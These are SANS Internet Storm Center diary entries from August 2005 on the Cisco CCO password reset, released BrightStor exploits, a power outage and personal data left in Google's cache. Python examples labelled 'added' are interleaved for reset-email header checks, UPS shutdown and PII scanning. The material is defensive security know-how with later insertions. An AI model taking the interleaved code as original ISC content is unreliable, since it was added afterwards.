Cisco Password Leak Source

It appears the passwords could be leaked through the search engine.

from: http://www.cisco.com/security/

"Cisco Systems, Inc. was made aware of a vulnerability of a search tool on Cisco.com that could expose passwords for registered users."

Cisco CCO Password Reset Reply-To Spoof Concern

Testing confirmed a spoofed reply-to field in a message to the CCO Locksmith would be accepted.

We notified the Cisco PSIRT team and they are reviewing the spoofed
reply-to issue.
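As an added example, not Cisco's code, here is the kind of From:/Reply-To: check a reset-by-mail service would want, in Python over constructed messages (the sender addresses are made up; cco-locksmith@cisco.com is the mailbox named in the diary). The last constructed case shows why comparing the two headers is not enough on its own: the decision also has to be anchored on the address registered for the account, and the reset should go only there.

```python
"""From:/Reply-To: consistency check for a reset-by-mail service.

Added example, not Cisco's code. Messages are constructed; the locksmith
address is the one quoted in the diary, the senders are made up.
"""
from email import message_from_string
from email.utils import parseaddr

LEGIT = """\
From: Jane User <jane@example.org>
To: cco-locksmith@cisco.com
Subject: password reset

"""

LEGIT_SAME_REPLY_TO = """\
From: Jane User <jane@example.org>
Reply-To: JANE@EXAMPLE.ORG
To: cco-locksmith@cisco.com
Subject: password reset

"""

SPOOFED_REPLY_TO = """\
From: Jane User <jane@example.org>
Reply-To: someone-else@example.net
To: cco-locksmith@cisco.com
Subject: password reset

"""

# The display name carries the registered address; the real mailbox is another.
DISPLAY_NAME_TRICK = """\
From: "jane@example.org" <someone-else@example.net>
Reply-To: someone-else@example.net
To: cco-locksmith@cisco.com
Subject: password reset

"""


def mailbox(header_value):
    """Bare addr-spec from a header, lower-cased; the display name is ignored."""
    return parseaddr(header_value or "")[1].strip().lower()


def headers_consistent(raw):
    """(ok, reason): ok when any reply would reach the From: mailbox."""
    msg = message_from_string(raw)
    sender = mailbox(msg.get("From"))
    if not sender:
        return False, "no usable From: address"
    reply_to = msg.get("Reply-To")
    if reply_to is None:
        return True, "no Reply-To:, replies go to From:"
    if mailbox(reply_to) == sender:
        return True, "Reply-To: names the From: mailbox"
    return False, f"Reply-To: {mailbox(reply_to)} differs from From: {sender}"


def safe_to_send(raw, registered):
    """Header check plus the anchor that matters: the From: mailbox must be
    the address registered for the account, and the reset goes only there."""
    ok, _ = headers_consistent(raw)
    return ok and mailbox(message_from_string(raw).get("From")) == registered.lower()


if __name__ == "__main__":
    for name, raw in [("LEGIT", LEGIT), ("SAME", LEGIT_SAME_REPLY_TO),
                      ("SPOOFED", SPOOFED_REPLY_TO), ("TRICK", DISPLAY_NAME_TRICK)]:
        print(name, headers_consistent(raw), safe_to_send(raw, "jane@example.org"))
```

The header comparison alone passes DISPLAY_NAME_TRICK, because both headers really do name the same mailbox; only the comparison against the registered address in safe_to_send rejects it. A service that always sends to the registered address and never to whatever the incoming headers say makes the Reply-To: question moot, which is the safer design.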

Patch Tuesday Preview

Next Patch Tuesday: 8/9/2005

6 bulletins (including one or more critical vulnerabilities)

Update to the Malicious Software Removal Tool

Important updates for the various update services

Fixes We're Hoping to See:



Windows 2000 SP4 Rollup 1 Re-Release


"If you are affected by these issues, we suggest that you do not install Update Rollup 1 for Windows 2000 SP4 until the corresponding hotfix is available. We plan to reissue Update Rollup 1 for Windows 2000 SP4 soon. Several hotfixes will be integrated into the new version of Update Rollup 1 for Windows 2000 SP4."

Helpful Tool of the Day

eWeek is reporting on the new MS Word Redaction Tool:



Robert Danford

SANS ISC Handler on Duty


Published: 2005-08-03

(Update #Last : 23:00GMT) Cisco! Pancho!; MetaMetasploit?; BrightStor Exploits/Scanner; It Takes a Village...; Mystery; GHH

Prologue: There isn't going to be a "Bouncing Malware" installment today. I've been mighty busy over the last week or so (anyone want to come help me sand the peeling stain off my deck?) and I've not had time to work on one. Soon. I promise.

Cisco CCO Password Issue

Ever have one of those days? Looks like Cisco is having one of those months... It appears that something has happened to compromise the passwords for their Cisco Connection Online service. What exactly happened? Cisco isn't saying.

Attempting to log into CCO brings up the following terse message:

* Cisco has determined that Cisco.com password protection has been compromised.
* As a precautionary measure, Cisco has reset your password. To receive
your new password, send a blank e-mail, from the account which you entered
upon registration, to cco-locksmith@cisco.com. Account details with a new
random password will be e-mailed to you.
* If you do not receive your new password within five minutes, please
contact the Technical Support Center.
* This incident does not appear to be due to a weakness in Cisco products
or technologies.

<crude_sarcasm> Note: I do, indeed, know what caused this issue, but I've been enjoined from disclosing it until next year's Black Hat. </crude_sarcasm>

Gotta love that last bullet point... It reinforces that old security maxim: All the technology in the world won't save you from doing something dumb.

Update: A tip o' the always stylish Handler-On-Duty propeller beanie goes out to Scott who wondered whether Cisco is having Pancho check for differences in the "From:" and "Reply-To:" addresses on messages to cco-locksmith@cisco.com before sending out a password. He is...

Follow the Bouncing... uh... ummm... Vulnerability?

Yesterday, we reported that there was a recently announced vulnerability in (can you say "ironic"?) Metasploit.

When we reported it, it was a vulnerability.

Then it wasn't....

Seems that the issue wasn't in Metasploit itself, but could be triggered if a vulnerable third-party terminal program was used along with Metasploit.

In keeping with Liston's Third Law ("The amount of Irony in the universe is a constant"), another real vulnerability popped up to take its place. It seems as though there is an issue in MSFWeb (the Metasploit Framework Web interface) that could allow for unauthorized access. Either run "msfupdate" or wait for version 2.5.0. (Thanks Gilles!)

ARCserve BrightStor Exploits/Scanner

Bringing forward this note from an early update to yesterday's diary 'cause it's important...:

If you haven't already patched your BrightStor ARCserve Backup software, now would be a really good time. At least three different exploit codes and the code for a scanner have now been released. Links to patches can be found in
. Here is how CA rates this

Threat Assessment

Overall Risk: High
Impact: Critical
Popularity: Medium
Simplicity: Medium

If you don't think the kiddies are jumpin' on this one,
the spike in port 6070 activity.

(Thanks Lorna!)

It Takes a Village...

Just yesterday, I received a canned message from a vendor:

"I'm updating my address book. Please take a moment to update your latest contact information. Your information is stored in my personal address book and will not be shared with anyone else. Plaxo is free, if you'd like to give it a try."

This was followed by a listing of my contact information that he'd sent to Plaxo and a link where I could sign up for his wonderful free service too.

No, I'd rather not, thank you.

Over the past few years, I've noticed the rising tide of online "communities." And like some sort of unholy sludge, they've increasingly been floating across the Internet and seeping their way into my inbox.

Stop it.

Stop it now.

Both Plaxo and the recently discovered (for me) sms.ac entice users to "import and invite" their contacts. They make it easy, giving the clueless noobs step-by-step instructions on how to upload the contents of their contact lists.


Just don't.

If you happen to have someone's contact information, that person gave that contact information to you. If they wanted their information given to Plaxo or sms.ac, they would give it to them. Do you go around posting your friend's phone numbers on bathroom walls? Do you walk up to strangers on the street and give them Aunt Mildred's P.O. Box? How about your teenage daughter's IM identity?

Needless to say, Mr. Vendor (and his boss) got a quick phone call from me, wherein I pointed out my belief that some village somewhere must be missing its idiot.

Don't follow in his footsteps. Your village needs you...

...Workin' On Mysteries Without Any Clues...

Not as strange and mysterious as what you might find in the back of a '60 Chevy:


but interesting none-the-less.

(w/apologies to Mr. Seger)

Google Hack Honeypot

Interesting concept. Check it out


Tom Liston - Intelguardians Network Intelligence, LLC



Published: 2005-08-02

Diary Update for Cisco Greeting and ARCserve Exploits and Scanner; Regular Diary: Kismet / Metasploit / New Buffer overflows ARCserve/ New Nigerian Scam / Google update / PwStealers project / Power Ou

Diary update

Cisco Greeting

It has been reported and confirmed that folks attempting to log into Cisco's website were met with the following greeting:

"Cisco has determined that Cisco.com password protection has been compromised.

As a precautionary measure, Cisco has reset your password. To receive your new password, send a blank e-mail, from the account which you entered upon registration, to cco-locksmith@cisco.com. Account details with a new random password will be e-mailed to you.

If you do not receive your new password within five minutes, please contact the Technical Support Center.

This incident does not appear to be due to a weakness in Cisco products or technologies"

It appears that this was limited in the scope and time that it was appearing. We don't have further details at this time. If anyone has any information to add, please let us know.

ARCserve Exploits and Scanner

If you haven't already patched your BrightStor ARCserve Backup software, now would be a really good time. At least three different exploit codes and the code for a scanner have now been released. Farther down in the diary, you will see the links for where you can get your patches for these vulnerabilities.

Here is how CA rates this vulnerability:

Threat Assessment

Overall Risk: High

Impact: Critical

Popularity: Medium

Simplicity: Medium

Regular Diary

Kismet / Metasploit

We received some questions about the vulnerabilities in Kismet disclosed at DefCon. The Kismet Wireless website includes the following message:

"Mon Aug 01 2005 - Fixes to the announced vulnerabilities in Kismet are in progress (pending info) tonight, stay tuned for a big announcement when the vulns are fixed."

References: http://www.kismetwireless.net/

There was also some discussion about the supposed vulnerability in the Metasploit Framework disclosed at DefCon. It was assigned the Bugtraq ID of 14431.

"Metasploit Framework is prone to an unspecified vulnerability. This issue allows remote attackers to compromise the computer of users using the affected application."

References: http://www.securityfocus.com/bid/14431/info

UPDATE: from Security Focus website:

This BID has been retired as it has been determined that the issue is not a vulnerability. Additional information has been provided that states the issue is due to insufficient filtering of potentially malicious terminal escape sequences when logging external input. These escape sequences are not interpreted at any point by the application, and only pose a threat if rendered with an external viewer within a terminal emulator program that will interpret them. In that instance, this presents a security vulnerability in the terminal emulator program. As Metasploit does not interpret the malicious input itself, it is not within the scope of the application to filter this type of input. This is not a vulnerability in Metasploit since it does not impact security properties of the application itself.

at: http://www.securityfocus.com/bid/14431/discuss

The same kind of information was issued for the CANVAS suite, with a Bugtraq ID of 14446.

"Immunity CANVAS is prone to an unspecified vulnerability. This issue allows remote attackers to compromise the computer of users running the affected application."

References: http://www.securityfocus.com/bid/14446/info

Brian Krebs wrote about these in his blog as well, after attending the Shmoo Group track at Defcon. Good reading.

References: http://blogs.washingtonpost.com/securityfix/2005/07/patching_your_e.html

There was also some discussion about it on the Daily Dave mailing list, if you want to follow.

References: https://www.immunitysec.com/pipermail/dailydave/2005-August/002266.html

There is not much info about these yet, but we recommend that you be careful when using these tools while doing your 'tests'... :)

New Buffer overflows ARCserve

New Buffer overflows on BrightStor ARCserve Backup and BrightStor Enterprise Backup application agent code used on Windows platforms.

The security update can be downloaded from:

BrightStor ARCserve Backup r11.1 for Windows:

BrightStor ARCserve Backup r11.0 for Windows:

BrightStor ARCserve Backup v9.01 for Windows:

BrightStor Enterprise Backup v10.5 for Windows:

BrightStor Enterprise Backup v10.0 for Windows:

New Nigerian Scam

We got an example of another Nigerian scam. This time they are trying to help us! :)

"Presently we discovered that some certain miscreants pose as
Bank/government officials to defraud innocent people off their hard
earn money."

"Help fight crime to make this earth a better place to live in."

Oh, come on... Does anyone still believe in this kind of scam? :)
(ok... I know the answer...)

Google update

Regarding Lorna's diary from yesterday, we received some requests to include the URL at which the data was stored. We are not announcing the site in question, as we are attempting to protect the private information.

PwStealers project

Ok, this is a request for PwStealer samples for an article that I am writing... so, if you get some, could you please send them as a .zip with the password "infected" and the subject "pwstealer"? :)

Power Outage Fun

One of the ISC handlers had the fun of dealing with a pretty major power
outage this afternoon. The building that he works in has office areas, the
primary IT data center for his campus, as well as the regional law
enforcement dispatch. Most of the office areas have deskside UPS units to
help protect the more expensive workstations (such as sun workstations) or
the more critical computers that are located in the office. As this
building was outfitted in recent years with a natural gas based generator,
and has a large scale UPS for the data center, there should not have been
much more than a blip on the radar screen today. Right? Wrong.

The data center UPS has functioned quite well throughout, with the only
reason to shutdown servers was to limit the amount of heat being
generated. The deskside UPS units were sized in such a way that those
important office systems could handle any fluctuations caused by the power
outage itself, as well as any problems with the generator adjusting as it
phases in and out of the utility power.

Though the generator does undergo routine tests, the generator failed to
bring the building power back in a timely manner. Apparently, the
building load was high enough (due to summer heat and the large number of
new servers being brought online in the new fiscal year) that it would
automatically trip itself with an overload condition each time it tried to
take over. The facilities management personnel eventually used the various
building breakers to turn off the AC for the datacenter (which is not on
the UPS), lights, and a few other of the large breakers. Then they were
able to force the generator to take the building load, and slowly flip
back on some of the building level breakers. That allowed the generator
to slowly take over the load in a way it could handle. I am almost
certain that there will be discussions with the manufacturer and the
facilities management about how to avoid this issue again and whether there
is anything that can test for this type of event.

The other notable event comes from the systems administrators of the large
installation servers in the data center. Recently, most of them have
received the nice new deskside UPS units to help protect their
workstations in the office. Half of them had dutifully installed these new
UPS units, while others had not taken the time to do so, or were just
waiting for the next power outage to force them to take down their
workstation so they could re-cable things in their office. Unfortunately,
some of the ones who had installed their UPS did so incorrectly. One
particular one had gone as far as to plug his windows computer and monitor
into the battery backed-up plugs and accidentally had the LCD panel and Sun
workstation plugged in on the surge suppressed side. Another installed
things correctly, but had installed the vendor supplied software on his
windows computer (with the LCD) but hadn't configured it. A third had
intended to use one of the systems in the data center to secure shell into
his workstation and shut it down gracefully, but failed to ever have the
host-based firewall rules (or was it tcp wrappers) configured to allow
connections originating from the datacenter back into the workstation.

Thankfully, no perceived damage has occurred to any of the workstations,
and the outage lasted maybe 30 minutes prior to the generator finally taking
on the full load. (They were still on generator power at last check and
there may be further problems as the generator phases back out to utility

In all of this, the ISC handler noted that many unexpected difficulties
were just that.... unexpected. The company he works for had actually
planned for power outages (especially weather related ones), so their
standard operating procedure had come into play for the data center. The
sysadmins had however not planned as thoroughly on their office
workstations. Things like having monitors (or printers) plugged into the
battery port, or having the more critical workstation plugged into the
surge suppressed port can be seen as simple oversights. The individual
who had not configured the security in such a way as to allow remote
administration from the data center, probably had the right idea, but had
failed to test it (until today). And the one individual who had his
windows computer using vendor supported software configured to shutdown
within 5 minutes of a power outage also had the right idea, but failed to
think through the process of "Oh, I need the windows computer and LCD up
long enough that I can shut down the unix system. Don't need to let
the automatic software kick in at a predetermined time, just need to start
the auto shutdown procedure if it's after work hours, or the battery is reporting 5
minutes left to go."
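The policy the handler sketches in that last quote is worth writing down so it can be tested before the next outage rather than during it. What follows is an added example, not something from the diary or from any UPS vendor's software: the decision rule, the ordering of the shutdown steps, and a preflight check for the SSH path that the third administrator never verified. Office hours, the five-minute threshold and the host names are assumptions of the example; the preflight uses standard OpenSSH options only.

```python
import subprocess

# Added example, not from the ISC diary or any UPS vendor's software.
# Assumptions: office hours 08:00-18:00 (24h clock), the five-minute
# battery threshold quoted in the diary, host names supplied by the caller.
WORK_START_HOUR = 8
WORK_END_HOUR = 18
LOW_BATTERY_MINUTES = 5


def should_shutdown(on_battery, minutes_left, hour):
    """Decide whether an automatic shutdown should start now.

    The diary's rule: start it if the outage happens after work hours
    (nobody present to do it by hand) OR the battery reports five minutes
    or less. On utility power the answer is always no."""
    if not on_battery:
        return False
    if minutes_left <= LOW_BATTERY_MINUTES:
        return True
    return hour < WORK_START_HOUR or hour >= WORK_END_HOUR


def shutdown_order(console_host, unix_hosts):
    """Return the commands in the order they must run: every Unix host is
    halted over SSH first, and the console PC (the Windows box with the
    LCD) goes last, because it is the machine issuing the SSH commands."""
    steps = ['ssh -o BatchMode=yes root@%s /sbin/shutdown -h now' % h
             for h in unix_hosts]
    steps.append('%s: shutdown /s /t 60' % console_host)
    return steps


def preflight(unix_hosts, timeout=5):
    """Verify, while power is fine, that each SSH path is actually allowed
    through host firewalls and TCP wrappers. Returns the hosts that could
    not be reached; run this from the same machine that will do the
    shutdown (office PC or a data center host)."""
    failed = []
    for h in unix_hosts:
        r = subprocess.run(['ssh', '-o', 'BatchMode=yes',
                            '-o', 'ConnectTimeout=%d' % timeout,
                            'root@%s' % h, 'true'],
                           stdout=subprocess.DEVNULL,
                           stderr=subprocess.DEVNULL)
        if r.returncode != 0:
            failed.append(h)
    return failed


if __name__ == '__main__':
    # Hypothetical hosts for illustration only.
    print(should_shutdown(True, 4, 14))
    for step in shutdown_order('office-pc', ['sun-ws']):
        print(step)
```

Wire `should_shutdown` into the vendor software's "on battery" hook with the values it reports, and put `preflight` in a weekly cron job so a firewall or wrappers change shows up as a failed check instead of as a dirty filesystem after the next outage.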

To you our readers, this is an excellent time to consider a few questions
concerning your standard operating procedures. Here are a few questions
asked by the ISC handler who experienced this today.

* If this event had been weather related, or had occurred at a time when
only the operations staff were in the office, would the on-hand staff know
what to do, who to call?

* If you have deskside units, have you configured the automatic shutdown
software properly?

* And for part of the security piece of this, have you configured the
firewall rules, tcpwrappers, etc etc, in such a way that you can
gracefully shutdown from a remote location (home or other designated

* Do you know for a fact that the network will be up if you needed to
shutdown across the network (including that little 4 or 8 port switch in
your office)?

* Have you actually planned what to do in the event of an emergency or

* Are your generators physically secured and checked routinely in the case
of vandalism or other similar problems?

If you haven't planned for the unexpected, it will eventually get you.


Handler on Duty: Pedro Bueno - pbueno %% isc. sans. org


Published: 2005-08-01

Cash from the Cache; Port 32772

Cash from the Cache

You never can tell where you will find things, and today was no exception. We received a report from Colin Keith about some interesting information that was found in Google's cache. It seems an order for Internet services triggered a little looksy by the sales department. Due to the dollar amount of the request, they checked the account name being given with a highly sophisticated tool. Yes, a Google query soon brought up the individual's name as well as a bit more than they bargained for. It seems ALL of this individual's personal information was found on the web in Google's cache, including the following fields, and no data was missing from ANY of them:

First name:

Last name:







Mother's Maiden Name:

Driver Licence:

Issued State:


Card Type:

Card name:

Card number:

Expiry Date:


ATM Pin:

Bank Name:

Bank Phone:

Routing Number:

Account Number:

Paypal Email:

Paypal Password:

It really only gets worse. This was not the only person who had their account information here. Granted, the Google cache dated from 2004, but that doesn't really matter when you have this kind of information lying around. Obviously someone was attempting to use it. Other things included in the cached info for some folks included purchase information such as the product and quantity purchased, how the product was to be shipped, where it was to be shipped, cost, subtotal, tax, shipping and even special instructions such as notes to be attached to the item if it was a gift.

I don't want to even attempt to guess where this information was illegally obtained from, considering the different types of information involved, the location of the website and the location of the requestor. Yes, we have reported it. What I do want to focus on is the fact that MANY people's personal as well as financial data was sitting out on the Internet for anyone to access if they just looked. The fact that the information has now been sitting out there for over seven months only further drives home the point of how critical it is to do Google searches on yourself. Keep in mind that this too has its dangers. Though some may disagree with me, I wouldn't be entering my credit card information and searching on it. Also, please do this from a patched machine, firewall turned on, antivirus updated and using a safe web browser. However, it is important to put your name, as well as your family members' names, in Google and/or other search engines, and see what turns up. Use different combinations of your name as they might have used in the past, and consider looking for old email addresses that may have been used as well. When you get the results, don't just go to the web site, but also click on the link for the cached information and see what used to be there. None of the data above was found on the current website, just in the cached information. None of the information would naturally be found on this type of site. So, before anyone attempts to get cash from the cache using your name, beat them to it by making sure no information about you is out there that should not be.

For any of you who work with/for the different search engines or have first hand knowledge about how to get cached information removed, we would appreciate you dropping us a line with some details.
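Reviewing cached copies by eye does not scale past a few pages. The following is an added example, not code from this diary or from any search engine: a Python scanner you can run over saved page text (a cached copy of one of your own sites, or a results page saved to disk) that looks for the kinds of fields listed above. It validates card numbers with the Luhn checksum and routing numbers with the ABA checksum so that order numbers and other digit runs are not reported, and it emits only redacted values so the report itself cannot leak anything. The sample page text is constructed; the card number is the well-known Visa test number and the routing number was chosen only to satisfy the checksum.

```python
import re

# Added example, not from the ISC diary or from Google.
# Scan text retrieved from a cache or a public page for financial
# identifiers that should never be there, and report them redacted.


def luhn_ok(digits):
    """Luhn checksum used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def aba_ok(digits):
    """ABA routing number checksum: weights 3,7,1 repeated, sum mod 10 == 0."""
    if len(digits) != 9 or not digits.isdigit():
        return False
    weights = (3, 7, 1, 3, 7, 1, 3, 7, 1)
    return sum(int(d) * w for d, w in zip(digits, weights)) % 10 == 0


def redact(digits):
    """Keep only the last four digits so a report can be shared safely."""
    return '*' * (len(digits) - 4) + digits[-4:]


# 13-19 digits, optionally separated by spaces or dashes, not inside a longer run
_CARD = re.compile(r'(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)')
# exactly nine digits, not inside a longer run
_ROUTING = re.compile(r'(?<!\d)\d{9}(?!\d)')
# labelled fields whose mere presence with a value is a finding
_LABELS = re.compile(
    r"(?im)^\s*(atm pin|paypal password|mother'?s maiden name|account number)\s*:\s*(\S.*)$")


def scan_for_pii(text):
    """Return a list of (kind, redacted_value) findings for the text."""
    findings = []
    for m in _CARD.finditer(text):
        digits = re.sub(r'[ -]', '', m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            findings.append(('card', redact(digits)))
    for m in _ROUTING.finditer(text):
        if aba_ok(m.group()):
            findings.append(('routing', redact(m.group())))
    for m in _LABELS.finditer(text):
        findings.append((m.group(1).lower(), '<redacted>'))
    return findings


# Constructed sample, modelled on the field list in the diary. The order id
# and account number are nine digits but fail the ABA checksum, so only the
# genuine routing number is reported as such.
SAMPLE_CACHED_PAGE = """\
Order confirmation (constructed sample, not real data)
First name: Jane
Last name: Doe
Card Type: Visa
Card number: 4111 1111 1111 1111
Expiry Date: 12/06
ATM Pin: 1234
Routing Number: 999999992
Account Number: 000123456
Order id: 123456789
"""

if __name__ == '__main__':
    for kind, value in scan_for_pii(SAMPLE_CACHED_PAGE):
        print('%-15s %s' % (kind, value))
```

Point it at files you have fetched yourself; the checksums cut the false positives from phone numbers, order ids and timestamps, and the labelled-field patterns catch the cases (PINs, passwords, maiden names) that have no checksum to validate.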

Port 32772

Okay, curiosity will be my downfall yet. This port has had a significant jump in it for the last couple of days. The targets are few, but the source and the record numbers have really spiked. Anybody seeing any traffic on this or have any ideas? Please pass them our way if you don't mind. Packets are always nice and welcome as well :>)

Lorna Hutcheson

Handler on Duty